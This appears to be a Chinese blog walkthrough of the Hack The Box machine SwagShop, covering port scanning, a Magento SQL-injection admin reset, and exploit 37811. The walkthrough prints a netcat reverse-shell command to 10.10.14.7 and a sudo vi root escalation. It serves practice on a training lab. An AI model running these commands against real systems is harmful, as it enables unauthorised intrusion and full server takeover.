HTB 学习笔记
【Hack The Box】linux练习-- SwagShop
🔥系列专栏:Hack The Box
🎉欢迎关注🔎点赞👍收藏⭐️留言📝
📆首发时间:🌴2022年11月17日🌴
🍭作者水平很有限,如果发现错误,还望告知,感谢!
文章目录
- HTB 学习笔记
- 信息收集
- 80
- 二进制提权
信息收集
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 b6:55:2b:d2:4e:8f:a3:81:72:61:37:9a:12:f6:24:ec (RSA)
| 256 2e:30:00:7a:92:f0:89:30:59:c1:77:56:ad:51:c0:ba (ECDSA)
|_ 256 4c:50:d5:f2:70:c5:fd:c4:b2:f0:bc:42:20:32:64:34 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Home page
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
80
需要添加hosts,在url显现出了
gedit /etc/hosts
而后我们发现这是一个购物网站
具体功能点没有发现有什么
搜索一下开源cms
我想知道版本信息
看到一个应该是插件的更新日志吧
先放着
THIS IS A METAPACKAGE FOR UPGRADE FROM 0.9 TO 1.0
Mage_Core_Modules
- Mage_Core_Adminhtml
- Interface_Adminhtml_Default
- Interface_Frontend_Default
- Interface_Install_Default
gobuster dir -u http://swagshop.htb/index.php/ -x php -w /usr/share/dirb/wordlists/common.txt
可以深度扫描
也可以习惯性的访问一下admin页面,果然有
但是弱口令无效
因为网站底部显示这个是2014年,于是我去搜历史版本发布时间
两个版本,一个是1.9一个是1.14
但是37811我们用不了,他需要认证,需要我们提供用户账号密码
于是我找到了一个exp
如下,可以直接修改后台账号密码
https://github.com/joren485/Magento-Shoplift-SQLI/blob/master/poc.py
后台账号密码已经成功修改
现在我已经拿到了登陆凭据,我可以利用刚才的那个exp了
按照如下利用
python %s <target> <argument>\nExample: python %s http://localhost \"uname -a\""
但是我们在这之前还要先去修改一下py
这个是我们刚才目录扫描扫出来的
时间戳按照提示去找即可
python2 37811.py 'http://swagshop.htb/index.php/admin' "uname -a"
是的,我也不知道这个错误的产生以及如何解决,但我知道“如果解决不了问题,那就解决产生问题的人”
直接把报错的那一行删掉
python2 37811.py 'http://swagshop.htb/index.php/admin' "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.7 9001 >/tmp/f"
python -c 'import pty;pty.spawn("/bin/bash")'. python3也有效。
Ctrl-z 到后台 shell。 在本地提示下, stty raw -echo.
fg将外壳带回前面。
reset重新初始化终端。 如果提示输入终端类型,请输入 screen.
在重置外壳中, export TERM=screen.
www-data@swagshop:/home/haris$ sudo -l
Matching Defaults entries for www-data on swagshop:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User www-data may run the following commands on swagshop:
(root) NOPASSWD: /usr/bin/vi /var/www/html/*
sudo /usr/bin/vi /var/www/html/…/…/…/root/root.txt
二进制提权
sudo vi /var/www/html/a -c ':!/bin/sh'
或者
sudo vi -c ':!/bin/sh' /dev/null
![[附源码]java毕业设计-线上摄影平台系统](https://img-blog.csdnimg.cn/2390c641332849888d11cf7ec15c3f46.png)
